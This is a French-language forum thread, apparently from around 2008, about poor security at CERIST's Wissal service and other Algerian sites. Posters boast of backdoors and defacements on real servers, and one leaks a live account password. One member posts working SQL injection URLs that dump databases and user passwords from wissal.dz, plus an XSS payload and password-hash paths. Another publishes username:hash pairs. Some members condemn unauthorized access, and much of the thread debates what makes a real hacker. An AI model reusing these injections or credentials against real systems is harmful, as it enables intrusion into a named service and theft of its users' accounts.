Je me suis souvenu d'un constat que j'ai fait en vérifiant la validité des couplets user/password de la messagerie Wissal du Cerist qu'un "super hacker" a posté sur ce forumdz.
Ce service de messagerie permet de vérifier si un compte existe ou non par simple interrogation independament de la validité au non du mot de passe

Plus de détails : http://secdz.blogspot.com/2008/08/wissal-du-ceristentre-securit-et.html

Salam Salah c'est le siiper-hacker dont tu parles lol
Bah pour tout dire les mots de passe étaient accessibles (via une liste) a quiconque cherchait bien ;-) et je sais que tu les ai trouvé vu que tu es dans le mail4 ;-) ....
Maintenant que le compte "drsi" n'est plus, je peux donner son passe ;-) [virus20ikarus02] lol
Je crois que les gens du Cerist sont atteints de la fameuse maladie du jemenfoutisme chronique, la preuve je suis sur un autre serveur a eux :-)
------------------------------------
badrh0 = higgs_b0s0n ;-)

Les gens du CERIST ne sont pas sérieux, ça fait 2 ans que j'ai un backdoor qui traine sur un de leur serveur et la faille exploitée est toujours présente malgré l'avoir signalé par emails aux responsables. D'ailleurs, je les remercie de leur impolitesse en me laissant sans réponse.

Les gens du CERIST ne sont pas sérieux, ça fait 2 ans que j'ai un backdoor qui traine sur un de leur serveur et la faille exploitée est toujours présente malgré l'avoir signalé par emails aux responsables. D'ailleurs, je les remercie de leur impolitesse en me laissant sans réponse.

Salut HAVOC
Comment se fait-il que nos deux shells ne se soient jamais croisés :confused:
:D
Le débat serait beaucoup trop long si on se mettaient à chercher le pourquoi du comment dans ces histoires de sécurité, le fait est que ces sites sont là tout prêts à être pénétrés :p par quiconque le souhaite
Maintenant y'a ceux comme moi qui aiment le "Hacked by" :D et ceux comme SecDZ qui portent un nom qui n'a aucun sens puisque self-contradictoire :D [amicalement SecDZ ;)] et qui préfèrent (enfin je crois) alerter les admins un peu trop oisifs :o
Et du moment qu'on y est je prépare une ptite surprise pour un site trés connu ;-)

Salut;
ça na rien d'extraordinaire x)
http://wixxl.dz/xxxxer/userlist
Trouvé en 2 min chrono :o
Voilà :)

Salut;
ça na rien d'extraordinaire x)
http://wixxl.dz/xxxxer/userlist
Trouvé en 2 min chrono :o
Voilà :)
Salut hakim ;)
Bah j'ai jamais dis que c'était un truc de ouf :D
Par contre je ne trouve aucune raison valable pour qu'ils aient posé ça là :confused: , et un minimumu de sec aurait été de restreidre le directory listing :confused: Alors soit le mec qui a un jour fait ça était completement défoncé :D soit ils le font éxprés :cool:

un pote a moi a eu accès au FTP du cerist pendant des années.

j'ai les totos , les docs internes , les CV etc...


A+++

Salut HAVOC
Comment se fait-il que nos deux shells ne se soient jamais croisés :confused:
:D
Le débat serait beaucoup trop long si on se mettaient à chercher le pourquoi du comment dans ces histoires de sécurité, le fait est que ces sites sont là tout prêts à être pénétrés :p par quiconque le souhaite
Maintenant y'a ceux comme moi qui aiment le "Hacked by" :D et ceux comme SecDZ qui portent un nom qui n'a aucun sens puisque self-contradictoire :D [amicalement SecDZ ;)] et qui préfèrent (enfin je crois) alerter les admins un peu trop oisifs :o
Et du moment qu'on y est je prépare une ptite surprise pour un site trés connu ;-)

Tout d'abord parceque je laisse des backdoor discrets, pas toujours des backdoor PHP... se créer un user en ftp ou telnet c'est tout aussi efficace et plus discret.
Je reste caché vis-à-vis des antivirus et il y a tellement de sites hébergés que cela serait fastidieux d'y rechercher un backdoor manuellement.
Ils utilisent une architecture à base de Windows NT et d'IIS6 pensant que cela suffit à protéger leur serveur hors même un accès en lecture simple permet de faire pas mal de choses.
CERIST n'est pas le seul a avoir des serveurs pourri, je connais le site d'une ambassade qui est sans aucun doute le plus pourrie en matière de sécurité, tout cela à cause d'un déploiement du CMS très très très mal faite (pourtant un CMS professionnel sans failles connues), en faite, il suffit d'accéder a la page d'admin du site pour découvrir que le login et mot de passe est déjà enregistré, il n'y a plus qu'à se loguer :)
Bref... il y a plein d'anomalie de ce genre qui rendent le pirate très très très simple.

Tout d'abord parceque je laisse des backdoor discrets, pas toujours des backdoor PHP... se créer un user en ftp ou telnet c'est tout aussi efficace et plus discret.

Biennnn ;) malheuresement sais pas faire ça moi pour le moment :p lol


CERIST n'est pas le seul a avoir des serveurs pourri, je connais le site d'une ambassade qui est sans aucun doute le plus pourrie en matière de sécurité, tout cela à cause d'un déploiement du CMS très très très mal faite (pourtant un CMS professionnel sans failles connues),

Le plus grand problème des sites algeriens c'est que leurs admins pensent que le server est une poubelle :D il laissent trainer des années et des années des pages qui peuvent être une vraie bombe a retardement parfois (si on sait les manipuler convenablement :cool: )


en faite, il suffit d'accéder a la page d'admin du site pour découvrir que le login et mot de passe est déjà enregistré, il n'y a plus qu'à se loguer

Alors là c'est sûr ! l'admin était défoncé lorsqu'il a fait ça :D

Moi j'ai toujours cette question sans réponse :
Quel "vrai" de pirater un site, à part avoir l'impression de relever un défi....la première fois ça peut se comprendre , mais après....l'oisiveté peut-pêtre ??? non je ne trouve pas.

Moi j'ai toujours cette question sans réponse :
Quel "vrai" de pirater un site, à part avoir l'impression de relever un défi....la première fois ça peut se comprendre , mais après....l'oisiveté peut-pêtre ??? non je ne trouve pas.
Là je crois que rak t3ayarni poliment ;) mais pas grave :)
C'est sûr que si je n'avais pas du temps a en revendre je ferais moins le mariole :D mais tant que je suis au chomage :( je continuerais a hacker lol :D
Et moi je me pose une question :
" a quoi ça sert de se creuser la tête pour trouver une faille de sec pour aprés avertir un admin un peu trop maladroit en faisant ainsi le travail de ce dernier alors que lui est payé pour faire ça et moi pas ????! :confused: non désolé je préfère encore savourer le hacked by :D sauf bien sûr si c'est un site que je respecte beaucoup :cool: ?"
Réponse : Non je cherche mais ne trouve pas !!!

Là je crois que rak t3ayarni poliment ;) mais pas grave :)

Désolé, c'était un coup de gueule :-)


mais tant que je suis au chomage :( je continuerais a hacker lol :D

Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?



Et moi je me pose une question :
[I]" a quoi ça sert de se creuser la tête pour trouver une faille de sec pour aprés avertir l'admin un peu maladroit en faisant ainsi le travail de ce dernier alors que lui est payé pour faire ça et moi pas ????!

La réponse dépend de tes convictions et de tes principes dans la vie...je sais c'est philosophique :-)


sauf bien sûr si c'est un site que je respecte beaucoup

Ou que tu ne peux pas pirater :-)

Désolé, c'était un coup de gueule :-)
hummmmm, t'as été la cible d'un pirate on dirait :D


Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?
Mon domaine c'est pas l'informatique, c'est tout autre chose, et je m'y investit serieusement, mais quand j'en ai marre, je vais prendre l'air, et cet air c'est le h@cking ;-) , peut-être que ça me passera, surement, mais je vois le bon coté des choses, en même pas 3 mois j'ai reussis a apprendre ce que mes camarades n'ont pas appris en 5 ans d'ingeniorat a l'univ ;) et maintenant ils viennent même demander mon aide :cool:, je ne trouve pas ça normal, surtout que pour moi c'est une activité collatérale, et je suis loin d'être un cr@ck :p


La réponse dépend de tes convictions et de tes principes dans la vie...je sais c'est philosophique :-)
C'est vrai, mais je ne cause jamais de mal aux sites que je visite :cool: (sauf ceux que je déteste :D ), juste je dis : "j'étais là" :D

Ou que tu ne peux pas pirater :-)
lol c'est vrai que y'en a une tonne contre qui j'ai une dent amis malheureusement je ne peux rien faire, mais patience je n'en suis qu'a mes débuts :cool:

Trés cool la convers avec toi SecDz ;) j'éspère que tu n'as pas d'animosité a mon encontre :rolleyes:

hummmmm, t'as été la cible d'un pirate on dirait :D

A ma connaissance non :-)...mais c'est là tout le problème : "savoir"


en même pas 3 mois j'ai reussis a apprendre ce que mes camarades n'ont pas appris en 5 ans d'ingeniorat a l'univ ;)

C'est toi qui est un génie, mais ceux les nuls :-)


je suis loin d'être un cr@ck :p

Je te crois sur parole :-)


C'est vrai, mais je ne cause jamais de mal aux sites que je visite :cool: (sauf ceux que je déteste :D ), juste je dis : "j'étais là" :D

L'accès non autorisé, avec ou sans dégats, est répréhensible.
Que dira-tu de quelqu'un qui s'introduit dans ta maison (même si tu as laissé la porte ouverte) et qui a comme excuse : "j'ai rien cassé et j'ai rien pris" ???!!!!


j'éspère que tu n'as pas d'animosité a mon encontre :rolleyes:

J'ai seulement du regret !
Pense une seule fois au cas où tu tombe sur quelqu'un qui pourra te tracer et t'identifier....alors tu n'aura plus le temps ni pour ton activité principale ni celle "collatérale".....c'est vrai que les lois chez nous dans ce domaine sont presque inéxistante...mais c'est aussi ça qui aggravera la situation de ceux qui seront pris

A ma connaissance non :-)...mais c'est là tout le problème : "savoir"
Tu t'appelles SecDz non ! Au fait il faut que tu penses comme un h@cker :D


C'est toi qui est un génie, mais ceux les nuls :-)

:rolleyes: Ah non là tu me gattes :p


Je te crois sur parole :-)

:mad: Je passe :D


L'accès non autorisé, avec ou sans dégats, est répréhensible.
Que dira-tu de quelqu'un qui s'introduit dans ta maison (même si tu as laissé la porte ouverte) et qui a comme excuse : "j'ai rien cassé et j'ai rien pris" ???!!!!
J'accepte ses éxcuses :D parceque c'est moi le co'n qui a laissé ma porte ouverte lol :D


J'ai seulement du regret !
Relaxe ! Je tue pas des vies ni me shoutte a la cok :p


Pense une seule fois au cas où tu tombe sur quelqu'un qui pourra te tracer et t'identifier....alors tu n'aura plus le temps ni pour ton activité principale ni celle "collatérale".....c'est vrai que les lois chez nous dans ce domaine sont presque inéxistante...mais c'est aussi ça qui aggravera la situation de ceux qui seront pris
Que veux-tu ? j'aime jouer a la roulette russe :p
Non plus serieusement, il est tout a fait possible que quelqu'un arrive a me pister, mais dans ce cas ça ne sera pas un admin algerien lol :) ,aprés avoir piraté le site du rnd y'a quelqu'un qui m'a contacté comme quoi un ami amgerien a un ami a lui lui a demander de s'occuper d'un probleme de sécurité :eek: , faut-il passer par l'ami étranger d'un ami pour faire ça ???!!! Le problème ne se poserait surement pas si on recrutait par compétences et non pas selon "les épaules" dans ce bled ! Mais si c'est comme ça alors le h@ck :D est un semblant de revenche pour moi ....
Toujours est-il qu'il a promit de me trouver mais je ne vois rien venir :confused: :D


Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?
Donnes moi des idées toi si ça t'a réussi :) , si tu parviens a me convaincre alors là j'arrêterais le h@ck ;) promis, et tu pourras ajouter une ba pour ta philo :D

PS: Si ce n'est pas contre tes convictions ptêt que tu pourras porter ta contribution :cool: (http://www.forumdz.com/showthread.php?t=5590)

Cela me fait sourir de voir parler de ******* quand on se contente d'exploiter des backdoor PHP (sans vraiment connaitre leur fonctionnement) ou des failles bien connues tirées de site comme milw0rm.

Le ******* c'est plus profond que ça, un vrai piratage se fait sur un système informatique sécurisé et unique. Attaquer un site parce qu'il utilise un CMS mal fait ou dont l'admin ne se préoccupe pas de la sécurité cela n'est pas valorisant.

Je n'oserais jamais dire que je suis un hacker ou que je hack des serveurs en m'attaquant à ceux du CERIST par exemple, cela est tellement simple que cela demande qu'un minimum de connaissance théorique et pratique, je vois mal une personne hacker rééllement un serveur ou un réseau sans avoir de connaissance (compilation, réseaux, programmation, cryptographie...).
D'ailleurs, on ne voit jamais un "hacker" algérien hacker un réseau ou un système de cryptage. Cela reste que des attaques "de surface" qui visent la couche web du serveur. Au mieux, on n'attaque un serveur à l'aide d'une faille connue dont l'exploit est largement disponible sur le net.

C'est un peu comme le phénomène du ******* des réseaux wifi au temps ou le cryptage WEP était répendue. Tout les bidouilleurs s'amuser à hacker le réseau des voisins hors vu les outils disponibles et les tutos cela se résumait à entrer bêtement une liste de commande et à être patient. Combien de ces gens là ont pris la peine d'étuder le cryptage WEP ? commbient savent ce qu'est un vecteur d'initialisation ? Combien savent ce qu'est la différence entre cryptage WEP et WPA? Savent-il ce qu'est un algorithme CRC, RC4...Etc ? Comment s'effectue l'authtification d'un PC en réseau wifi protégé par le protocole WEP?
Pourtant ces choses "élémentaires" sont obligatoirement à connaitre pour mettre au point des techniques d'attaques du réseau.

Bref, souvent les gens pensent qu'utiliser un outil équivaut à le maitriser. Le ******* c'est loin d'etre représentatif par les exploits trouvés sur le net.

Cela me fait sourir de voir parler de ******* quand on se contente d'exploiter des backdoor PHP (sans vraiment connaitre leur fonctionnement) ou des failles bien connues tirées de site comme milw0rm.

Le ******* c'est plus profond que ça, un vrai piratage se fait sur un système informatique sécurisé et unique. Attaquer un site parce qu'il utilise un CMS mal fait ou dont l'admin ne se préoccupe pas de la sécurité cela n'est pas valorisant.

Je n'oserais jamais dire que je suis un hacker ou que je hack des serveurs en m'attaquant à ceux du CERIST par exemple, cela est tellement simple que cela demande qu'un minimum de connaissance théorique et pratique, je vois mal une personne hacker rééllement un serveur ou un réseau sans avoir de connaissance (compilation, réseaux, programmation, cryptographie...).
D'ailleurs, on ne voit jamais un "hacker" algérien hacker un réseau ou un système de cryptage. Cela reste que des attaques "de surface" qui visent la couche web du serveur. Au mieux, on n'attaque un serveur à l'aide d'une faille connue dont l'exploit est largement disponible sur le net.

C'est un peu comme le phénomène du ******* des réseaux wifi au temps ou le cryptage WEP était répendue. Tout les bidouilleurs s'amuser à hacker le réseau des voisins hors vu les outils disponibles et les tutos cela se résumait à entrer bêtement une liste de commande et à être patient. Combien de ces gens là ont pris la peine d'étuder le cryptage WEP ? commbient savent ce qu'est un vecteur d'initialisation ? Combien savent ce qu'est la différence entre cryptage WEP et WPA? Savent-il ce qu'est un algorithme CRC, RC4...Etc ? Comment s'effectue l'authtification d'un PC en réseau wifi protégé par le protocole WEP?
Pourtant ces choses "élémentaires" sont obligatoirement à connaitre pour mettre au point des techniques d'attaques du réseau.

Bref, souvent les gens pensent qu'utiliser un outil équivaut à le maitriser. Le ******* c'est loin d'etre représentatif par les exploits trouvés sur le net.

Havoc j'éspère que tu ne parles pas de moi dans ce poste :D parceque je n'oserais jamais aller piocher dans milw0rm, utiliser le dork, et h@cker des sites comme ça a l'aveuglette !!!!!!! Bien sûr je ne maîtrise pas les trucs que tu viens de citer (mais je compte y remedier;) ) mais quand je trouve une faille c'est en appliquant toutes mes connaissances (aussi étroites soient-elles), et puis c'est quoi un backdoor??? je crois que les options les plus courantes qui s'y trouvent ne sont pas trop dure a comprendre (je veux dire coté code) enfin ! je parle pour moi ! toutes les options que j'utilise je sais comment elles fonctionnent, et justement je suis entrain de concocter un shell perso qui comporte éxclusivement ce dont j'ai besoin :cool: ! Quant au ******* haut niveau dont tu parles, je crois qu'il faut beaucoup de temps pour oser dire qu'on le maîtrise bien.
Oui je hack les couches web, mais ça ne fait pas de moi pour autant un script-kiddy :p et si tu maîtrise ce dont tu parles, je trouve que c'est bien ;) mais il ne faut pas juger les gens juste comme ça !!!
Bonne nuit a tous et pour ceux qui h@ckent : bon ******* :D

Salut tout le monde ^^

Et bah a mon avis ce n'est pas la peine de recréer des shells pour les utiliser surtout si ça existe déjà !! pourquoi perdre du temps a faire ce que les autres ont déjà fait ? si c'est pour dire enfin de compte "Tiens j'ai pu le faire aussi" tandis que les autres ont crées autre chose .. bref à mon avis les hackers, crackers ainsi les script-kiddies sont la bienvenu dans le monde de l'informatique parce que ça aide les développeurs et les webmasters a mieux connaitre leurs fautes et ça les aide a progresser (pas le cas de tout le monde bien sur).

Petite question à HAVOC : pourquoi utilises-tu un navigateur si tu n'arrives pas a en faire un ? est-ce que cela fait de toi un aussi script-kiddies en voulant naviguer sur le net ?

C'est un simple exemple je trouve, et puis pour badrh0 fait ce qui te semble correct, j'aimerai bien qu'ils écrivent ton pseudo à Aljazeera un jour pourquoi pas lol ^^ et puis tu ne peux pas juger celui qui respect ses principes en disant que tel faille se trouve dans tel service ^^ on est libre de faire ce qu'on veut vu que la loi n'existe pas dans notre pays !

On sait tous que les administrateurs des sites officieux algériens ne sont pas capables de faire leurs boulots

a mon avis vaut mieux qu'ils laissent leurs places a ceux qui les méritent .. je le dis clairement .. Je ne veux pas qu'un jour les étrangers se moquent de nos compétences dans le domaine de la sécurité informatique..

Et le plus grand problème est le fait de vouloir créer un site .dz (Ils demandent même l'acte de naissance de nos grand grand grand pères, pour un site NON SECURISE) ... qu'ils le gardent pour eux ..

Cordialement

Petite question à HAVOC : pourquoi utilises-tu un navigateur si tu n'arrives pas a en faire un ? est-ce que cela fait de toi un aussi script-kiddies en voulant naviguer sur le net ?

Ne le prend pas mal mais cet exemple est complètement à coté de la plaque ! Tu utilises un browser autant qu'internaute et non programmeur.
De plus, je parle de comprendre le fonctionnement et non de concevoir, un informaticien sait comment fonctionne un browser même s'il ne va pas coder son propre navigateur.

C'est pareil pour les backdoor, il faut savoir comment il fonctionne, qu'elles fonctions il exploite...etc. Donc il faut connaitre le langage dans lequel il est codé, ces connaissances par exemple permettront de surmonter certaines systèmes de protection au lieu de se demander bêtement pourquoi son shell ne permet pas d'injecter des commandes...etc.

Je remarque que trop souvent ceux qui se mettent au hacker (y'a un effet de mode ces dernières années) se lance directement dans la lecture de tuto de hack... cette façon de faire suffit pour comprendre le niveau initiatique du ******* mais pour le reste il faut d'abord apprendre des choses plus terre à terre comme la programmation, les réseaux...etc.

Aussi, pour aller loin l'apprentissage de l'anglais devient une obligation. Personnellement, j'suis étudiant en informatique... je ne me forme pas particulièrement au *******, je préfère rester dans la branche maitre de ma filière puis me spécialiser au fur et à mesure dans les réseaux et la sécu... par expérience, je sais que cela diffère beaucoup de ce qu'on peut apprendre sur le ******* en fouillant sur le net et cela devient plus chiant à un certain niveau (car plus théorique) mais quand on aime on prend le meilleur et le pire d'une passion.

Bon, les failles de sécurité dans les sites algériens sont devenus des choses banales ...
et là, on voit les amateurs profitent de plus en plus, sans aucune préalable connaissance du domaine ...

Mais, je me demande s'il y a une gendarmerie spéciale contre la crime technologique ( piratage ) en Algérie ou pas ???

Mais, je me demande s'il y a une gendarmerie spéciale contre la crime technologique ( piratage ) en Algérie ou pas ???
Tu n'as rien fumé? :o

t'en es sur de toi ?!!! ... :D

Hi? :)

Désolés vous parlez comme les script kiddies, en fait, je l'observation que vous ete un Hacker "badrh0" Un vrai hacker par vos réponses et vos commentaires à une côté, et dans une autre côté , je vous vois comme un Defacer/Pirate-à-dire l'ensemble "Lamer"z/Noob"z" à mon avis, toujours et tout le moment, les pauvres defacers ils pensent qu'ils sont des vrais Hackers, ils viens de changer l'index par la trébuche de la publicité, ils utilisent les programmes écrits par d'autres, avec très peu de connaissances sur la façon dont ils travaillent, et puis . . . c'est du H4CKING? :), et aussi, pensez-vous que le Hacker est comme une personne qui entre dans les ordinateurs, pour tout briser le système. Le hacker est souvent mélangé avec le cracker/pirate qui est aussi appelé « hacker au mauvais sens du terme ».

En fait, je vais écrit sur un sujet c'est quoi Un véritable hacker et les types . . . , et d'autres types dans le domaine de la sécurité .

/UntilX

En fait ,
En tant que je suis Un Grey HAT :) j'ai fait un petit test d'un 5mn

Un bug SQL injection simple;
pour avoire tout les database installè sur leur server Mysql

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,schema_name,nu ll,null,null,null,null,null,null,null+from+informa tion_schema.SCHEMATA

Les passwords et les Users:
http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,concat(usernam e,0x3e,user_password),null,null,null,null,null,nul l,null,null+from+Wforum.Wf_users

Une faille XSS, je vais codè une Worm JS pour cette XSS et je la poste;
http://www.wissal.dz/index.php?file=archivenews&nat=</script><script>alert("XSS")</script>

Passwd Hash Disclosure (DES Unix (htaccess)):
http://www.wissal.dz/passwd
http://www.wissal.dz/admin

/UntilX :D

C'est un simple exemple je trouve, et puis pour badrh0 fait ce qui te semble correct, j'aimerai bien qu'ils écrivent ton pseudo à Aljazeera un jour pourquoi pas lol ^^

Allah yahafdak ;) enfin quelqu'un qui ne critique pas ;)


a mon avis vaut mieux qu'ils laissent leurs places a ceux qui les méritent .. je le dis clairement ..

Tout a fait d'accord avec toi :cool: malheureusement dans notre bled c'est soit les "épaules" qui font la loi, soit les sentiments du genre "3andah wlidattes meskine" ! Bah qu'il se recycle ou alors il prend sa retraite et laisse un jeune demarrer sa vie :cool:


Je ne veux pas qu'un jour les étrangers se moquent de nos compétences dans le domaine de la sécurité informatique..

Ils le font déja ! mais ça ne m'étonnerait pas que dans 10 ans on importe des chinois ou des indiens pour nous construire des sites (informatiques) :D


... Ils demandent même l'acte de naissance de nos grand grand grand pères, ....

Sûrement pour vérifier que ton arrière-arrière-grand père n'ait pas des factures imayées quant a l'hébergement de son site .dz :D


Ne le prend pas mal mais cet exemple est complètement à coté de la plaque ! Tu utilises un browser autant qu'internaute et non programmeur.

Ne le prend pas mal mais c'est toi qui est a coté de la plaque ! Son exemple est tout a fait concordant si translaté vers l'univers des h@ckers, je m'éxplique, un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins ! Mais je ne crois vraiment pas que quelqu'un qui n'y connais strictement rien pourrait arriver loin en utilisant des outils trouvés sur le net !


De plus, je parle de comprendre le fonctionnement et non de concevoir, un informaticien sait comment fonctionne un browser même s'il ne va pas coder son propre navigateur.

Un h@ker (pas un script kiddy) comprend les fonctionnement d'environs ... disons 50% du c99 par exemple, mais il ne saurait (sans grandes difficultés) coder ces 50% ! Un informaticien (bon) sais comment fonctionne le browser (disons IE7) a disons 50% mais il ne saurait comprendre un buffer overflow (sans grandes difficultés) dans ledit browser !


cette façon de faire suffit pour comprendre le niveau initiatique du ******* mais pour le reste il faut d'abord apprendre des choses plus terre à terre comme la programmation, les réseaux...etc.

Je suis d'accord avec toi, mais ça m'étonnerait que quelqu'un qui ne sait même pas coder du php ou du c aille chercher a pirater un site, il peut bien sûr être tenté :D mais il ne fera rien :D
Et tu as en face l'étudiant qui (aussi bon soit-il) se débat avec ses études d'informatique, alors je ne crois pas qu'en apprenant les requetes SQL il ait l'idée de faire une injection SQL, sinon ça serait un vrai visionnaire :D


Aussi, pour aller loin l'apprentissage de l'anglais devient une obligation

C'est le cas de toute discipline scientifique si on veut faire des études de haut niveau, mais je ne vois pas ce que ça a avoir avec le sujet :D


par expérience, je sais que cela diffère beaucoup de ce qu'on peut apprendre sur le ******* en fouillant sur le net

Et c'est justement ça le problème, a l'armée, on ne fait pas que t'enseigner a manier le fusil mais aussi a réfléchir comme l'ennemi (enfin j'éspère :D)


et cela devient plus chiant à un certain niveau (car plus théorique) mais quand on aime on prend le meilleur et le pire d'une passion.

C'est ça l'envers de la médaille, mais come tu dis il faut tenir le coup, mais apparement beaucoup de gens du CERIST ne le voient pas de cet oeil :D


Tu n'as rien fumé?

Je confirme, il a pris quelque chose :D


t'en es sur de toi ?!!! ...

Et voilà maintenant qu'il délire en croyant qu'il y'a une police gouvernementale secrète :D
Je crois que dans un autre domaine cela serait tout a fait plausible, mais pas ici, tu n'as qu'a aller jeter un coup d'oeil dans les site gov.dz on croirait des antiquités :D alors si vraiment y'avait des gens compétants dans les hautes sphères (toutes les sphères :D ) ils feraient un peu mieux que ça (http://www.cg.gov.dz) [regarder le <Title> :D] :D
En plus si ça éxistait tu n'aurais pas ton DVD windows vista pour 70DA :D et tu ne poserais sûrement pas ce genre de question maintenant :D


Désolés vous parlez comme les script kiddies ...

Saha le h@-coeur :D


... en fait, je l'observation que vous ete un Hacker "badrh0" Un vrai hacker par vos réponses et vos commentaires à une côté, et dans une autre côté , je vous vois comme un Defacer/Pirate-à-dire l'ensemble "Lamer"z/Noob"z" à mon avis, toujours et tout le moment, les pauvres defacers ils pensent qu'ils sont des vrais Hackers, ils viens de changer l'index par la trébuche de la publicité, ils utilisent les programmes écrits par d'autres, avec très peu de connaissances sur la façon dont ils travaillent, et puis . . . c'est du H4CKING? ...

:p OK Unix je ne sais pas dans quelle langue tu parles, mais je crois deviner que ran t3ayarni :D peu importe ce que je fais ou pourquoi je le fait ou même quel niveau j'ai, je vois beaucoup de dénigrement dans ce domaine, alors je me ralirais au fil de pensée de SecDz qui dit " soit on accepte soit on se tait " :cool:


En fait, je vais écrit sur un sujet c'est quoi Un véritable hacker et les types . . . , et d'autres types dans le domaine de la sécurité .

Alors je te conseille de changer de langue :p

*** Ce genre d'informations ne sont pas admises sur ce forum ***

En fait ,
En tant que je suis Un Grey HAT :) j'ai fait un petit test d'un 5mn

Un bug SQL injection simple;
pour avoire tout les database installè sur leur server Mysql

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,schema_name,nu ll,null,null,null,null,null,null,null+from+informa tion_schema.SCHEMATA

Les passwords et les Users:
http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,concat(usernam e,0x3e,user_password),null,null,null,null,null,nul l,null,null+from+Wforum.Wf_users

Une faille XSS, je vais codè une Worm JS pour cette XSS et je la poste;
http://www.wissal.dz/index.php?file=archivenews&nat=</script><script>alert("XSS")</script>

Passwd Hash Disclosure (DES Unix (htaccess)):
http://www.wissal.dz/passwd
http://www.wissal.dz/admin

/UntilX :D

Saha Unix +1 pour toi (mais je les avais déja :D)
Par contre ce que j'ai pas pu faire c'est déchiffrer ça :
cip:/lWBYZtMu1IwQ
admin:aLrm37XQuIu12
anep1901:0avLGdWTspfvU

Si tu y arrive alors là oui tu prouveras que tu es un vrai de vrai :cool:

Ne le prend pas mal mais c'est toi qui est a coté de la plaque ! Son exemple est tout a fait concordant si translaté vers l'univers des h@ckers, je m'éxplique, un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins ! Mais je ne crois vraiment pas que quelqu'un qui n'y connais strictement rien pourrait arriver loin en utilisant des outils trouvés sur le net !

Et voilà que tu refais encore la même erreur ! Je ne parle pas de conception mais de compréhension ! Ce sont des termes simples à comprendre normalement !
Un shell est un outil qui permet d'automatiser ou simplifier une tache. C'est facile d'injecter des commandes via un shell... cela ne veut pas dire pour autant qu'on comprend comment le shell fonctionne.
Je connais pleins de noobs qui hack régulièrement des sites en exploitants de failles connus et des shell sans ne connaitre ni le langage PHP ni le fonctionnement concret d'un shell... il ne faut pas exagérer les choses, l'exploitation d'un backdoor tel qu'un C99 relève du jeu d'enfant !




Un h@ker (pas un script kiddy) comprend les fonctionnement d'environs ... disons 50% du c99 par exemple, mais il ne saurait (sans grandes difficultés) coder ces 50% ! Un informaticien (bon) sais comment fonctionne le browser (disons IE7) a disons 50% mais il ne saurait comprendre un buffer overflow (sans grandes difficultés) dans ledit browser !

Un script kiddies coder un C99... laisse moi rire ! Tu veux dire copier coller et non programmer !
J'ai connu pleins de script kiddies qui ont attaqués pas mal de sites algériens, après avoir discuté avec eux j'ai vu qu'ils n'étaient pas capables ni de coder en PHP ni d'effectuer correctement des requêtes SQL. Ces des gens qui "singent" des méthodes relativement simples, qui sont inscrits à de nombreux forum et qui demandent de l'aide dès la moindre difficulté, leur seul plaisir et de tager le net de leurs pseudos.

Comprendre un bufferOverFlow ? Ce n'est surement pas un script kiddies ou un apprenti hacker qui comprendra mieux un BoF qu'un informaticien, il faut déjà maitriser un langage de programmation, avoir des connaissances en assembleur et en architecture des machines... Bref... entre comprendre et maitriser il y a tout un monde... C'est encore une fois facile de prendre un exploit du net pour faire un bufferOverFlow.



Je suis d'accord avec toi, mais ça m'étonnerait que quelqu'un qui ne sait même pas coder du php ou du c aille chercher a pirater un site, il peut bien sûr être tenté :D mais il ne fera rien :D
Et tu as en face l'étudiant qui (aussi bon soit-il) se débat avec ses études d'informatique, alors je ne crois pas qu'en apprenant les requetes SQL il ait l'idée de faire une injection SQL, sinon ça serait un vrai visionnaire :D

Qu'est ce qu'est une injection SQL ? Penses-tu que cela relève du miracle ? Il suffit de bien réfléchir à son code pour les éviter, de plus y'a pleins d'outils qui permettent de vérifier si son application en contient ou pas. Les Injection SQL sont traitées lors qu'on étudie les bases de données et la programmation web.
Il ne faut pas prendre pour exemple les ingénieurs qui obtiennent une moitié de diplôme et qui ne s'intéressent pas à leur métier ou encore les techniciens qui se retrouvent à faire un boulot qui les dépasses.

Saha Unix +1 pour toi (mais je les avais déja :D)
Par contre ce que j'ai pas pu faire c'est déchiffrer ça :
cip:/lWBYZtMu1IwQ
admin:aLrm37XQuIu12
anep1901:0avLGdWTspfvU
Si tu y arrive alors là oui tu prouveras que tu es un vrai de vrai :cool:

Ah parce que tu as pu déchiffer le mot de passe admin de la boite ? Vu les mots de passe habituellement utilisé par CERIST cela m'étonnerait que tu y soit arriver même avec des Go de rainbow tables.

Pour ce qui est du fichier que tu mentionnes, cela à tout l'air d'etre le contenu d'un htpasswd lequel utilise un cryptage MD5 spécifique à apache ;)

Et voilà que tu refais encore la même erreur ! Je ne parle pas de conception mais de compréhension ! Ce sont des termes simples à comprendre normalement !

Je devrais y arriver merci :D


Un shell est un outil qui permet d'automatiser ou simplifier une tache. C'est facile d'injecter des commandes via un shell... cela ne veut pas dire pour autant qu'on comprend comment le shell fonctionne.
Je connais pleins de noobs qui hack régulièrement des sites en exploitants de failles connus et des shell sans ne connaitre ni le langage PHP ni le fonctionnement concret d'un shell... il ne faut pas exagérer les choses, l'exploitation d'un backdoor tel qu'un C99 relève du jeu d'enfant !

Ok j'ai compris, mais un n00b devrait avoir beaucoup d'ingeniosité pour uploader les shell sur le serveur ciblé :p en dans ce cas je crois qu'on devrait enlever un zéro et l'appeler n0b :D
Ne pas connaitre le PHP et h@cker ???? :confused: ça tient du miracle :eek:


